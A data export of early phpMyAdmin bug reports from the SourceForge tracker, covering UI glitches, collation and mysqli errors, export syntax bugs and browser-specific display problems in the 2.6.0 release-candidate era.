In Search If there is a field with less than 200 foreign keys the total) before a field with more than 200 foreign keys, the second field shows a drop down box with the foreign keys from the first field.
This happens because the variable disp row is not set empty.
fix libraries get foreign.lib.php 51 replace unset disp) with unset disp row) windows 2000 server apache 1.3.27 PHP 5.0.0 Original URL https sourceforge.net p phpmyadmin bugs 1366 https sourceforge.net p phpmyadmin bugs 1366 Original author j0erch Found in version 2.6.0 rc1","bug"
"24444","7734","Calendar popup wrong month and year navigation.
Thanks to nijel for changing the visibility of calendar popup Bug 1005421)!
But now there s more severe problems with the calendar popup regardless of theme or language used) Date field in table is empty or 0000 00 00 Click on the calendar icon brings the calendar popup correctly with todays date marked.
Click on marked suggestion copies todays date into table field and the popup closes.
Repeating the same process does what it should do.
Date field in table is a valid date from todays month, but not todays day Click on the calendar icon brings the calendar popup with month = undefined .
Date field in table is a valid date from any other month except todays month) ok.
Using forward or reverse links on month or year allways loads complete phpmyadmin to the small calendar popup.
System pma phpMyAdmin 2.6.0 rc1 Browser Mozilla 5.0 Windows; U; Win98; en US; rv 1.7) Gecko 20040616 Webserver Apache 2.0.50 Win32) running on Windows NT PP 4.0 build 1381 PHP PHP 4.3.8 Apache 2.0 Handler MysQL MySQL 4.0.17 max nt Original URL https sourceforge.net p phpmyadmin bugs 1367 https sourceforge.net p phpmyadmin bugs 1367 Original author mandabaer Found in version Latest Git snapshot","bug"
"24444","7735","auto increment = 0.
Hi all, I use to modify my table by editing a record, modifying it s content and saving it as a new record.
My table is only about 20 records.
For the first 10, all was good and the auto increment continue increasing one by one... Suddendly, I saw that one record take the value of 0 for the auto increment) I try to check the table gt; Warning concerning a 0 value.
I try to duplicate the record and deletethe one with 0 OK I try to duplicate another record and the new one is set to 0 for the auto intrecemnt value.
I think it may be a bug !
MySQL version is 4.0.15 It is running under Windows 2003 Server.
My address is me autourdupc.com Regards, Laurent.
Original URL https sourceforge.net p phpmyadmin bugs 1368 https sourceforge.net p phpmyadmin bugs 1368 Original author anonymous Found in version 2.5.7 pl1","bug"
"24444","7736","2.6.0 rc1 Doesn t View Correct in Firefox.
When I view index.php in Mozilla Firefox 0.9.3 Windows), I see the panel that is supposed to be on the left, on the top instead.
Original URL https sourceforge.net p phpmyadmin bugs 1370 https sourceforge.net p phpmyadmin bugs 1370 Original author anonymous Found in version 2.6.0 rc1","bug"
"24444","7737","Create DB not shown with Control User.
This is actually with version 2.6.0 rc1 but that isn t selectable.
I created the control user and all those things from the file create tables.sql in the scripts directory that came with this latest version.
I finally used the control user and in the index at least that), it says that I do not have access to create a database.
I am currently logged in as root when this happens.
When I shut off the control user which is readonly... default), then it shows proper priviledges and lets me create databases.
Original URL https sourceforge.net p phpmyadmin bugs 1369 https sourceforge.net p phpmyadmin bugs 1369 Original author andyl56 Found in version Latest Git","bug"
"24444","7738","1267 Illegal mix of collations.
All queries return this error message 1267 Illegal mix of collations latin1 swedish ci,IMPLICIT) and utf8 general ci,COERCIBLE) for operation = The only time we don t get this is when we don t put a where clause.
We are using 4.1.2.
Original URL https sourceforge.net p phpmyadmin bugs 1371 https sourceforge.net p phpmyadmin bugs 1371 Original author donsimon Found in version Latest Git","bug"
"24444","7739","Doesn t View Correct in Safari.
The upper left frame, where I m supposed to be able to select a server and a database, is empty in 2.6.0 RC1.
In the CVS snapshot from 20040803 everything was still working fine.
A screenshot is attached.
If I right click in the empty frame and ask for the source of the frame, the source is completely empty, and the frame doesn t even know what URL it s supposed to contain.
The URL would normally show in the source window s titlebar, but in this case, it s empty.)
If I view source of the frameset, I see that the URL that s supposed to open into that frame is http pma.fusion queryframe.php?lang=en iso 8859 1 server=1 hash=77f4ca31ccd10d6c0ef2e2cfa4c56cd3109213397 3 If I open that URL manually, it loads just fine.
So I don t know what s happening.
No JavaScript error seems to be occurring.
The problem occurs whether I use the purple orange theme or the default one.
The OS is Mac OS X 10.3.5 7M34 The browser is Safari 1.2.3 v125.9 The server on the same machine, running the Apple provided Apache 1.3.29 with PHP 4.3.6 from www.entropy.ch Original URL https sourceforge.net p phpmyadmin bugs 1372 https sourceforge.net p phpmyadmin bugs 1372 Original author ryandesign Found in version 2.6.0 rc1","bug"
"24444","7740","Blob fields emptied.
If you change data in a record with an blob field, and no file is uploaded for this, the field is set to ... i.e.
a zero length string ... !
Info cfg[ ProtectBinary ] = blob ; Original URL https sourceforge.net p phpmyadmin bugs 1373 https sourceforge.net p phpmyadmin bugs 1373 Original author anonymous Found in version Latest Git","bug"
"24444","7741","Broken indexes grabbing with MYSQLI USE RESULT.
I am using NySQL 4.1.3 on Windows XP with PHP 5.
When I try to browse the contents of a table I get the following message Warning in ..\phpMyAdmin 2.6.0 rc1 \libraries\dbi\mysqli.dbi.lib.php on line 225 mysqli num rows ) Function cannot be used with MYSQLI USE RESULT debug backtrace ) is as follows array = 0 array = file string = F \Apache2\HTDOCS\phpMyAdmin 2.6.0 rc1\libraries\dbi\mysqli.dbi.lib.php line long = 225 function string = mysqli num rows args array = 0 object = mysqli result 1 array = file string = F \Apache2\HTDOCS\phpMyAdmin 2.6.0 rc1\libraries\display tbl.lib.php line long = 493 function string = PMA DBI num rows args array = 0 object = mysqli result 2 array = file string = F \Apache2\HTDOCS\phpMyAdmin 2.6.0 rc1\libraries\display tbl.lib.php line long = 1834 function string = PMA displayTableHeaders args array = 0 array = edit lnk string = ur del lnk string = dr sort lnk string = 1 nav bar string = 1 ins row string = 1 bkm form string = 1 text btn string = 1 pview lnk string = 1 1 array = 0 object = stdClass name string = db name orgname string = db name table string = pma pdf pages orgtable string = pma pdf pages def string = max length long = 7 flags string = part key binary multiple key not null type string = string decimals long = 0 multiple key long = 1 primary key long = 0 unique key long = 0 not null long = 1 unsigned long = 0 zerofill long = 0 numeric long = 0 blob long = 0 1 object = stdClass name string = page nr orgname string = page nr table string = pma pdf pages orgtable string = pma pdf pages def string = max length long = 2 flags string = num part key auto increment unsigned primary key not null type string = int decimals long = 0 multiple key long = 0 primary key long = 1 unique key long = 0 not null long = 1 unsigned long = 1 zerofill long = 0 numeric long = 1 blob long = 0 2 object = stdClass name string = page descr orgname string = page descr table string = pma pdf pages orgtable string = pma pdf pages def string = max length long = 16 flags string = not null type soft reference = decimals long = 0 multiple key long = 0 primary key long = 0 unique key long = 0 not null long = 1 unsigned long = 0 zerofill long = 0 numeric long = 0 blob long = 0 2 long = 3 3 array = 0 array = querytype string = SELECT select expr clause string = position of first select long = 0 from clause string = `pma pdf pages` group by clause string = order by clause string = having clause string = where clause string = where clause identifiers array = queryflags array = select from long = 1 select expr array = table ref array = 0 array = expr string = pma pdf pages db string = table name string = pma pdf pages table alias string = table true name soft reference = foreign keys array = 3 array = file string = F \Apache2\HTDOCS\phpMyAdmin 2.6.0 rc1\sql.php line long = 688 function string = PMA displayTable args array = 0 object = mysqli result 1 string = urdr111111 2 array = 0 array = querytype soft reference = select expr clause soft reference = position of first select soft reference = from clause soft reference = group by clause soft reference = order by clause soft reference = having clause soft reference = where clause soft reference = where clause identifiers soft reference = queryflags soft reference = select expr soft reference = table ref array = 0 soft reference = foreign keys soft reference = Original URL https sourceforge.net p phpmyadmin bugs 1374 https sourceforge.net p phpmyadmin bugs 1374 Original author tonymarston Found in version 2.6.0 rc1","bug"
"24444","7742","Wrong parameters for PMA DBI free result.
I am working with MySQL 4.1.3 on Windows XP with PHP 5\.
When I try to browse the contents of a table I get the following message Warning in ..\phpMyAdmin 2.6.0 rc1 \libraries\dbi\mysqli.dbi.lib.php on line 172 mysqli free result ) expects parameter 1 to be mysqli result, boolean given debug backtrace ) is as follows array = 0 array = file string = F \Apache2\HTDOCS\phpMyAdmin 2.6.0 rc1\libraries\dbi\mysqli.dbi.lib.php line long = 172 function string = mysqli free result args array = 0 bool = FALSE 1 array = file string = F \Apache2\HTDOCS\phpMyAdmin 2.6.0 rc1\libraries\display tbl.lib.php line long = 1438 function string = PMA DBI free result args array = 0 bool = FALSE 2 array = file string = F \Apache2\HTDOCS\phpMyAdmin 2.6.0 rc1\libraries\display tbl.lib.php line long = 1836 function string = PMA displayTableBody args array = 0 object = mysqli result 1 array = edit lnk string = ur del lnk string = dr sort lnk string = 1 nav bar string = 1 ins row string = 1 bkm form string = 1 text btn string = 1 pview lnk string = 1 2 array = node id array = 0 string = tree node 1 string = node id 2 string = tree level id 3 string = xample pers type id array = 0 string = pers type 1 string = pers type id 2 string = pers type desc 3 string = xample 3 array = 0 array = querytype string = SELECT select expr clause string = position of first select long = 0 from clause string = `person` group by clause string = order by clause string = having clause string = where clause string = where clause identifiers array = queryflags array = select from long = 1 select expr array = table ref array = 0 array = expr string = person db string = table name string = person table alias string = table true name soft reference = foreign keys array = 3 array = file string = F \Apache2\HTDOCS\phpMyAdmin 2.6.0 rc1\sql.php line long = 688 function string = PMA displayTable args array = 0 reference = 1 string = urdr111111 2 array = 0 array = querytype soft reference = select expr clause soft reference = position of first select soft reference = from clause soft reference = group by clause soft reference = order by clause soft reference = having clause soft reference = where clause soft reference = where clause identifiers soft reference = queryflags soft reference = select expr soft reference = table ref array = 0 soft reference = foreign keys soft reference = Original URL https sourceforge.net p phpmyadmin bugs 1375 https sourceforge.net p phpmyadmin bugs 1375 Original author tonymarston Found in version 2.6.0 rc1","bug"
"24444","7743","Sometimes PHP reported Cannot redeclare Error.
Sometimes, PHP reporded error.
Debug Error usr local apache2 htdocs mysql libraries select lang.
lib.php line 170 Cannot redeclare pma langdetect ) previously declared in usr local apache2 htdocs mysql libraries select lang.lib.
php 170) So I think this happen for PHP debug session only.
I have replaced require to require once in line require .
libraries select lang.lib.php ); for config.inc.php and stoped to get this error message.
Original URL https sourceforge.net p phpmyadmin bugs 1376 https sourceforge.net p phpmyadmin bugs 1376 Original author dime Found in version 2.5.5 pl1","bug"
"24444","7744","PHP notices if no theme cookie?.
In my php.ini I have error reporting set to show all errors, even notices, to ensure I write clean code.
When first visiting phpMyAdmin 2.6.0rc1 on this server with a browser that has not visited before, I get notices about undefined indexes into an array, with keys RightBgColor and BgColorOne.
I assume this happens because no cookie has been set telling PMA what theme to use?
A screenshot is attached.
You can ignore the broken images and formatting issues in the screenshot.
My custom error handler outputs an HTML table with images for formatting purposes.
Original URL https sourceforge.net p phpmyadmin bugs 1377 https sourceforge.net p phpmyadmin bugs 1377 Original author ryandesign Found in version 2.6.0 rc1","bug"
"24444","7745","Cannot create new database.
I am testing with PHP 5 with Apache 2.0.50 and MySQL 4.1.3 under WindowsXP.
On the HOME page under Create new database there is the comment No Privileges instead of a text box and a create button.
This is wrong as I am logged on as root user with full privileges.
Original URL https sourceforge.net p phpmyadmin bugs 1378 https sourceforge.net p phpmyadmin bugs 1378 Original author tonymarston Found in version 2.6.0 rc1","bug"
"24444","7746","Illegal mix of collations for operation UNION.
I am testing with PHP 5 with Apache 2.0.50 and MySQL 4.1.3 under WindowsXP.
If I go from HOME gt;Databases gt;Check Privileges any database) I get the following MySQL error 1267 Illegal mix of collations latin1 bin,IMPLICIT) and utf8 general ci,COERCIBLE) for operation UNION Original URL https sourceforge.net p phpmyadmin bugs 1379 https sourceforge.net p phpmyadmin bugs 1379 Original author tonymarston Found in version 2.6.0 rc1","bug"
"24444","7747","Error when changing collation character set for a field.
I am testing with PHP 5, Apache 2.0.50 and MySQL 4.1.3.
When I try to change the collation character set for a field I get the following error Warning in ..\phpMyAdmin 2.6.0 rc1 \libraries\dbi\mysqli.dbi.lib.php on line 225 mysqli num rows ) Function cannot be used with MYSQLI USE RESULT debug backtrace ) is as follows array = 0 array = file string = F \Apache2\HTDOCS\phpMyAdmin 2.6.0 rc1\libraries\dbi\mysqli.dbi.lib.php line long = 225 function string = mysqli num rows args array = 0 object = mysqli result 1 array = file string = F \Apache2\HTDOCS\phpMyAdmin 2.6.0 rc1\libraries\transformations.lib.php line long = 139 function string = PMA DBI num rows args array = 0 object = mysqli result 2 array = file string = F \Apache2\HTDOCS\phpMyAdmin 2.6.0 rc1\tbl alter.php line long = 139 function string = PMA setMIME args array = 0 string = undcp 1 string = country 2 string = country name 3 string = 4 string = 5 string = Original URL https sourceforge.net p phpmyadmin bugs 1380 https sourceforge.net p phpmyadmin bugs 1380 Original author tonymarston Found in version 2.6.0 rc1","bug"
"24444","7748","Table list mouse title hint) bad chars.
In left.php should be replaced htmlentities by htmlspecialchar.
Original URL https sourceforge.net p phpmyadmin bugs 1381 https sourceforge.net p phpmyadmin bugs 1381 Original author stanleymlha Found in version 2.6.0 rc1","bug"
"24444","7749","PHP errors in the SQL file upload dialog.
After I select the sql file and press send i got these errors Notice Uninitialized string offset 46 in C \htdocs\phpmyadmin\libraries\read dump.lib.php on line 75 Warning Cannot modify header information headers already sent by output started at C \htdocs\phpmyadmin\libraries\read dump.lib.php 75) in C \htdocs\phpmyadmin\libraries\ob.lib.php on line 61 .... and many other errors about header modifing ...
The same thing happens in the textarea sql dialog.
It seems that bug happens if sql dump contains Some comment information at the end.
Original URL https sourceforge.net p phpmyadmin bugs 1383 https sourceforge.net p phpmyadmin bugs 1383 Original author anonymous Found in version 2.6.0 rc1","bug"
"24444","7750","Inconsistent Table Ordering in Left Frame.... Hello everyone, I was just testing the latest version of phpMyAdmin on www.phpmyadmin.net and I noticed a huge error.
The database table ordering is inconsistent in the left frame compared to that shown in the table overview page in the right frame.
Left frame shows phpmyadmin 12) jan lucas luis mike PMA bookmark PMA column info PMA history PMA pdf pages PMA relation PMA table coords PMA table info pma test Right frame shows PMA bookmark PMA column info PMA history PMA pdf pages PMA relation PMA table coords PMA table info jan lucas luis mike pma test I submitted this same bug a few weeks ago, a staff member said that they would fix it and it somehow got deleted from the system and the problem was never resolved.
Thanks a bunch and good luck to the phpMyAdmin team.
Mike.
Original URL https sourceforge.net p phpmyadmin bugs 1382 https sourceforge.net p phpmyadmin bugs 1382 Original author izcool Found in version Latest Git snapshot","bug"
"24444","7751","Wrong db name phpmyadmin) generated in SHOW KEYS.
Installed Software Apache 2.0.50 MySQL 4.3.1 beta PHP 5.0.1 MySQLi extension enabled) phpMyAdmin 2.6.0 rc1 MySQLi enabled in config) Problem The following errors happen when I try to query the following tables in my database tskmdb.class tskmdb.class relation type tskmdb.class type etc.
SQL query Edit SHOW KEYS FROM `class` ; MySQL said Documentation 1146 Table phpmyadmin.class doesn t exist SQL query Edit SHOW KEYS FROM `class relation type` ;MySQL said Documentation 1146 Table phpmyadmin.class relation type doesn t exist SQL query Edit SHOW KEYS FROM `class type` ; MySQL said Documentation 1146 Table phpmyadmin.class type doesn t exist etc.
For some reason, it s translating tskmdb.class type to phpmyadmin.class type instead.
This is obviously incorrect.
Original URL https sourceforge.net p phpmyadmin bugs 1384 https sourceforge.net p phpmyadmin bugs 1384 Original author anonymous Found in version 2.6.0 rc1","bug"
"24444","7752","Comments break reloading frame displaying query.
take below example within query window or sql tab.
pay attention to the comment line.
8 lt; snip CREATE TABLE `tree` `id` int 11), `l` int 11), `r` int 11), `depth` int 11)) TYPE=MyISAM ; INSERT INTO `tree` `id`, `l`, `r`, `depth`) VALUES 1, 1, 4, 0); INSERT INTO `tree` `id`, `l`, `r`, `depth`) VALUES 2, 2, 3, 1); SET id=1; comment SELECT id,l,r,depth FROM tree WHERE id= id; gt;8 snip 2.5.7 shows correct result of last select query.
2.6.0 does not.
after deleting comment line, 2.6.0 works fine.
Original URL https sourceforge.net p phpmyadmin bugs 1385 https sourceforge.net p phpmyadmin bugs 1385 Original author ma2sc Found in version 2.6.0 rc1","bug"
"24444","7753","CSS typo activ=>active.
There s a small typo in the CSS files where active is missing the trailing e .
The attached patch fixes this.
Original URL https sourceforge.net p phpmyadmin bugs 1386 https sourceforge.net p phpmyadmin bugs 1386 Original author ryandesign Found in version Latest Git snapshot","bug"
"24444","7754","label improvement.
On the export page, you can select either Native MS Excel data format or CSV for Ms Excel data format.
The capitalization of MS should be the same in both cases.
The attached patch modifies all language files to capitalize MS in the second string.
Original URL https sourceforge.net p phpmyadmin bugs 1387 https sourceforge.net p phpmyadmin bugs 1387 Original author ryandesign Found in version Latest Git snapshot","bug"
"24444","7755","Problems displaying rows with over 50,000 records.
I have over 50,000 entries in one of my InnoDB tables.
First of all, when I click on the Browse tab, it says I have 53604 rows total.
If I click on the Browse tab again, it says I have 51468 rows total.
Finally, if I click on it again, it says I have 56941 rows total.
The problem is that it s not properly calculating the total number of rows.
Now, if I click on the gt; gt; button, it returns an empty result set.
This problem is the same problem that occurs in both the stable and the 2.6.0 rc1 version of phpMyAdmin.
The autoindex always returns the right number of rows.
However, this is separate from the problem above obviously.
For instance, my Next Autoindex is really 50,751 for the same table I used to describe the problem above.
This means that I really have 50,750 rows total and not 53604, 51468, 56941, etc.
I would give this one a high priority because it s annoying when you re working with a large amount of data.
In any case, this is a great product and I ll always continue to use it.
Great work guys!
By the way, here s my software infomation... Apache 2.0.50 MySQL 4.1.3 beta Max PHP 5.0.1 phpMyAdmin 2.5.7 pl1 phpMyAdmin 2.6.0 rc1 Original URL https sourceforge.net p phpmyadmin bugs 1388 https sourceforge.net p phpmyadmin bugs 1388 Original author anonymous Found in version 2.6.0 rc1","bug"
"24444","7756","Clicking on en iso 8859 1 returns en utf 8 instead.
I clicked on English en iso 8859 1) and yet it keeps returning to English en utf 8).
It still reports MySQL charset UTF 8 Unicode utf8) and MySQL connection collation utf8 general ci.
I can click on different MySQL connection collations and that s fine.
It s just when I try to switch to English en iso 8859 1), it doesn t seem to want to do it.
Always returns back to utf8.
Original URL https sourceforge.net p phpmyadmin bugs 1389 https sourceforge.net p phpmyadmin bugs 1389 Original author anonymous Found in version 2.6.0 rc1","bug"
"24444","7757","ldi table.php wrong label for checkbox replace.
The label for the Replace checkbox is defined incorrectly.
Instead of surrounding the word Replace , the label tag surrounds the description to the right of the word Replace .
Putting the label tag around the correct text is important for browsers like Firefox and Internet Explorer for Windows which interpret clicks on the label as clicks on the item to which the label relates.
The included patch fixes the problem.
Original URL https sourceforge.net p phpmyadmin bugs 1390 https sourceforge.net p phpmyadmin bugs 1390 Original author ryandesign Found in version Latest Git snapshot","bug"
"24444","7758","Untranslated string in tbl query box.php.
There s an untranslated string in tbl query box.php at line 467 alert Please insert a Bookmark Titel ); This is in the CVS snapshot 20040816 041020 Original URL https sourceforge.net p phpmyadmin bugs 1391 https sourceforge.net p phpmyadmin bugs 1391 Original author ryandesign Found in version Latest Git snapshot","bug"
"24444","7759","Space between radio checkbox and label or not?.
Attached is a screenshot of the export page, which is supposed to show that the PMA team has been unable to standardize on whether or not there should be a space between a radio button or checkbox and the label to its right.
The screenshot shows the newly added option Native MS Excel data with a space before its label while the other options have no space.
The simple fix here is to remove the space before the Native Excel label, and that will suffice for 2.6.0, but after that, the PMA team should decide on one way of doing the labels, and then do it that way everywhere.
Doing a couple searches through the source files, I estimate that 2 3 to 3 4 of the checkboxes radio buttons have a space between the widget and the label, and the other 1 3 or 1 4 do not.
But comparing the two styles, I think that it s visually more appealing, and closer to the way that it appears in other programs, without the space between the widget and the label.
In Safari anyway; Firefox widgets look awful no matter what you do ) ) Discussion? )
Original URL https sourceforge.net p phpmyadmin bugs 1392 https sourceforge.net p phpmyadmin bugs 1392 Original author ryandesign Found in version Latest Git snapshot","bug"
"24444","7760","This format has no options red in XML export.
When exporting as XML format, a message appears stating This format has no options.
It s shown in bold red text.
Any reason for that, or was it just someone s favorite color? )
Red often has the meaning of warning, stop, error, and none of these apply here.
I don t think the text needs to be bold or red.
Original URL https sourceforge.net p phpmyadmin bugs 1393 https sourceforge.net p phpmyadmin bugs 1393 Original author ryandesign Found in version Latest Git snapshot","bug"
"24444","7761","No left frame update after textfile import.
I am using the SQL page to insert a table from a text file.
The table is inserted correctly as I can see it after a manual refresh but there is no automatic refresh in the left frame.
Using Windows XP with latest updates PHP 5.0.0 mySQL 4.0.20d IE 6.0 with latest updates PMA 2.6.0rc2 CVS 20040816 041020) Apache 2.0.50 Original URL https sourceforge.net p phpmyadmin bugs 1395 https sourceforge.net p phpmyadmin bugs 1395 Original author anonymous","bug"
"24444","7762","IIS crashes on insert another new row.
phpMyAdmin 2.5.7 pl1 MySQL 4.0.20a nt max Windows XP Prof l IE Version 6.0.2800.1106 SP1 After entering data to insert a new row into a table, clicking the insert another new row radio button, then clicking GO button, Windows XP displays a dialog box that says Internet Information Services has encountered a problem and needs to close.
The detailed info is szAppName inetinfo.exe szAppVer 5.1.2600.1 szModName iisRtl.dll szModVer 6.0.2600.1 offset 0000fca0 IE then displays Page not found .
Doing the same process WITHOUT clicking the insert another new row radio button, works fine.
This is consistently repeatable.
Original URL https sourceforge.net p phpmyadmin bugs 1394 https sourceforge.net p phpmyadmin bugs 1394 Original author peterinsb","bug"
"24444","7763","IE6 unable to view pages Turck MMCache problem?).
On my system, viewing most pages causes Internet Explorer to continually attempt to refresh the page and eventually shows a Page not found error.
I have had this issue in previous versions of phpMyAdmin, but I have been able to fix it by forcing the output compression off.
However, doing the same in 2.6.0 beta 2 and RC1) has not fixed the problem.
I have tested this on Firefox and it does not produce the same problem.
My System versions phpMyAdmin 2.6.0 rc1 PHP 4.3.3 with Turck MMCache 2.4.6 installed) MySQL 4.0.13 Apache 2.0.48 Internet Explorer 6.0 2600.0000.xpclient.010817 1148) Windows XP Professional 2002) Original URL https sourceforge.net p phpmyadmin bugs 1396 https sourceforge.net p phpmyadmin bugs 1396 Original author anonymous Found in version 2.6.0 rc1","bug"
"24444","7764","Browse long text unable to parse url.
system RedHat 7.3 php 4.1.2 7.3.6 php mysql 4.1.2 7.3.6 mysql 3.23.58 1.73 PHPMyAdmin 2.5.7 when I try to Browse a table with a very long text field Warning unable to parse url tbl change.php?lang=en iso 8859 1 server=1 db=montagna europa it table=pagine pos=0 session max rows=30 disp direction=horizontal repeat cells=100 dontlimitchars=0 primary key= 60links 60 3D 27arnaldo colleselli.php 27 AND 60testo 60 3D 27 3CB 3EPROFILO DI UN POLITICO E DI UN AMMINISTRATORE ESEMPLARE 5Cr 5Cndi Gianfranco Orsini 3C 2FB 3E 5Cr 5Cn 5Cr 5CnA dieci anni dalla scomparsa di Arnaldo Colleselli 2827 dicembre 1988 29 la Fondazione che ne porta il nome ha voluto ricordarlo con questa pubblicazione in cui 2C oltre ad altri contributi 2C sono raccolte le lezioni di un corso di studio sul 22Diritto della Montagna 22 2C tema che gli fu particolarmente caro ed al quale dedic F2 costante attenzione durante la sua attivit E0 di amministratore e politico 2C opportunamente richiamata nel breve profilo che segue 2C a testimonianza di un impegno ammirevole al servizio della comunit E0.
5Cr 5Cn 5Cr 5CnUltimo di nove figli nacque il 2 settembre 1918 in mnt rhx phpMyAdmin 2.5.7 libraries common.lib.php on line 1852 Warning unable to parse url sql.php?lang=en iso 8859 1 server=1 db=montagna europa it table=pagine pos=0 session max rows=30 disp direction=horizontal repeat cells=100 dontlimitchars=0 sql query=DELETE FROM 60pagine 60 WHERE 60links 60 3D 27arnaldo colleselli.php 27 AND 60testo 60 3D 27 3CB 3EPROFILO DI UN POLITICO E DI UN AMMINISTRATORE ESEMPLARE 5Cr 5Cndi Gianfranco Orsini 3C 2FB 3E 5Cr 5Cn 5Cr 5CnA dieci anni dalla scomparsa di Arnaldo Colleselli 2827 dicembre 1988 29 la Fondazione che ne porta il nome ha voluto ricordarlo con questa pubblicazione in cui 2C oltre ad altri contributi 2C sono raccolte le lezioni di un corso di studio sul 22Diritto della Montagna 22 2C tema che gli fu particolarmente caro ed al quale dedic F2 costante attenzione durante la sua attivit E0 di amministratore e politico 2C opportunamente richiamata nel breve profilo che segue 2C a testimonianza di un impegno ammirevole al servizio della comunit E0.
5Cr 5Cn 5Cr 5CnUltimo di nove figli nacque in mnt rhx phpMyAdmin 2.5.7 libraries common.lib.php on line 1852 Original URL https sourceforge.net p phpmyadmin bugs 1397 https sourceforge.net p phpmyadmin bugs 1397 Original author lotabi Found in version 2.5.7","bug"
"24444","7765","port shown after cfg[][][ verbose ].
If cfg[ Servers ][ i][ port ] is set and If cfg[ Servers ] [ i][ verbose ] is set, then the 2nd greeting line in the right main) frame says Connecte to MySQL ... cfg[ Servers ][ i][ verbose ] cfg[ Servers ][ i][ port ] which is outright wrong sometimes.
Suggested Fix Omit cfg[ Servers ][ i][ port ] if cfg[ Servers ][ i] [ verbose ] is being used.
See My solution below.
Background see https phpmyadmin.hostsharing.net 2.6.0 beta2 index.php as a sample.
We have several servers, and we connect to them using ssh tunnels, having phpMyAdmin connect to local ports.
With cfg[ Servers ][ i][ verbose ], we insert the actual remote) host names.
If now a local) port is appended to a remote) host name, users are more than confused.
For the time being, I have set the cfg[ Servers ][ i] [ verbose ] strings to HOST via tcp 127.0.0.1 PORT which is not nice the port is shown twice in the heading) but at least, it s not misleading.
My Solution I tried a fix which worked for us.
It s just exchanging two lines in main.php at the end of the following block) before lt;?php Don t display server info if server == 0 no server selected) loic1 modified in order to have a valid words order whatever is the language used if server gt; 0) \{ robbat2 Use the verbose name of the server instead of the hostname if a value is set if !empty cfg[ Server ][ verbose ])) \{ server info = cfg[ Server ][ verbose ]; \} else \{ server info = cfg[ Server ][ host ]; \} server info .= empty cfg[ Server ] [ port ]) ?
.
cfg[ Server ][ port ]); after ?php Don t display server info if server == 0 no server selected) loic1 modified in order to have a valid words order whatever is the language used if server gt; 0) \{ robbat2 Use the verbose name of the server instead of the hostname if a value is set if !empty cfg[ Server ][ verbose ])) \{ server info = cfg[ Server ][ verbose ]; \} else \{ server info = cfg[ Server ][ host ]; server info .= empty cfg[ Server ] [ port ]) ?
.
cfg[ Server ][ port ]); \} Purodha hostsharing.net omit port after verbose name end see https phpmyadmin.hostsharing.net dev index.php as a sample how it works.
This is the cvs Version of last night with the above change applied) Maybe there is a similar change to be made in config.head.inc.php I was unable to figure out, what this code is used for, so I could not test it.
Greetings.
Purodha.
Original URL https sourceforge.net p phpmyadmin bugs 1398 https sourceforge.net p phpmyadmin bugs 1398 Original author purodha Found in version Latest Git","bug"
"24444","7766","Wrong export of TIMESTAMP with MySQL 4.1.
When I want to import, it will be faild when i use timestamp.
MySQL will this field in tick?)
but on phpMyAdmin the data are without it.
Wrong INSERT INTO `ordered genre` VALUES 8203, House , 2004 08 02 17 11 26, 1); correct INSERT INTO `ordered genre` VALUES 8203, House , 2004 08 02 17 11 26, 1 ); Database Version 4.1.3b beta nt but it is on all 4.1 databases on linux, too) I find this error on all 2.6 versions older not tested) Original URL https sourceforge.net p phpmyadmin bugs 1400 https sourceforge.net p phpmyadmin bugs 1400 Original author fbaier Found in version 2.6.0 rc1","bug"
"24444","7767","Browser shows only one page of results.
In phpMyAdmin 20040821 064120 only the first result page is shown.
Consequently, forward and last page buttons are missing.
In phpMyAdmin 20040816 041020 data browsing is ok. see attached screenshots sys phpMyAdmin 20040821 064120 WinNT4SP6 Apache 2.0.50 mod perl 1.99 13 Perl v5.8.4 PHP 4.3.8 MySQL 4.0.17 max nt Mozilla 5.0 Windows; U; Win98; en US; rv 1.7) Original URL https sourceforge.net p phpmyadmin bugs 1399 https sourceforge.net p phpmyadmin bugs 1399 Original author mandabaer Found in version Latest Git snapshot","bug"
"24444","7768","Unknown Encoding tis 620. when select thai tis 620 encoding has error.
Warning unknown encoding tis 620 in opt web2 html phpMyAdmin libraries string.lib.php on line 24 Original URL https sourceforge.net p phpmyadmin bugs 1401 https sourceforge.net p phpmyadmin bugs 1401 Original author anonymous Found in version 2.6.0 rc1","bug"
"24444","7769","javascript error in Opera 7.54.
Inline script thread Error name TypeError message Statement on line 3 Expression evaluated to null or undefined and is not convertible to Object window.parent.frames[ queryframe ] Backtrace Line 3 of inline 2 script in http work.rustex.ru myadmin260 left.php?lang=ru win1251 server=1 db=5 hash=5b1e6bd7c9bceea7cb3b6 185666c40da1093352180 if typeof window.parent.frames[ queryframe ] != undefined typeof window.parent.
frames[ queryframe ].document.forms[ left ] != undefined ) Original URL https sourceforge.net p phpmyadmin bugs 1402 https sourceforge.net p phpmyadmin bugs 1402 Original author anonymous Found in version 2.6.0 rc1","bug"
"24444","7770","missing comma when exporting table with 2 foreign keys.
I just created a table with two foreign keys and when I exported the table, there was a comma missing after the first foreign key line example CREATE TABLE `config` `cid` int 11) NOT NULL auto increment, `set id` int 11) NOT NULL default 0 , `smid` mediumint 5) default 1 , PRIMARY KEY `cid`), KEY `smid ind` `smid`), KEY `setid ind` `set id`) CONSTRAINT `settings for smid)` FOREIGN KEY `smid`) REFERENCES `submodules` `smid`) ON DELETE CASCADE ON UPDATE CASCADE CONSTRAINT `setting` FOREIGN KEY `set id`) REFERENCES `settings` `set id`) ON DELETE CASCADE ON UPDATE CASCADE ) TYPE=InnoDB; The orders of the tables where as well not right.
This was the first table exported and creating a foreign key if there are no tables is very hard.
I m using MySQL 4.0.20, PHP 5.0 and Opera 7.53 Ruben ruben voidofair.nl Original URL https sourceforge.net p phpmyadmin bugs 1404 https sourceforge.net p phpmyadmin bugs 1404 Original author anonymous Found in version 2.5.7 pl1","bug"
"24444","7771","Wrong Database Used Bug Safari only).
If you select several columns to drop using the checkboxes in the structure display, then using the xc2x93With Selectedxc2x94 pull down menu select xc2x93Dropxc2x94, Phpmyadmin will attempt to drop the selected tables from the database that you previously used, not the currently used database.
Example.
select database A from the lefthand Databases) pulldown menu.
select database B from the lefthand Databases) pulldown menu.
select several columns using the checkboxes in the structure display.
select Drop from the With Selected pulldown menu.
PhpMyAdmin then refreshes the righthand frame and loads a confirmation screen.
The string at the top of the confirmation screen reads Database A running on localhost If you confirm this, PhpMyAdmin drops tables from database A even though you were operating on database B .
This has only been observed using Safari 1.2.3 v125.9).
IE for the Mac did not display similar behavior.
Other environment stuff Mysql version 4.0.18 standard PHP version 4.3.8 Apache version 2.0.49 Original URL https sourceforge.net p phpmyadmin bugs 1403 https sourceforge.net p phpmyadmin bugs 1403 Original author anonymous Found in version 2.5.6","bug"
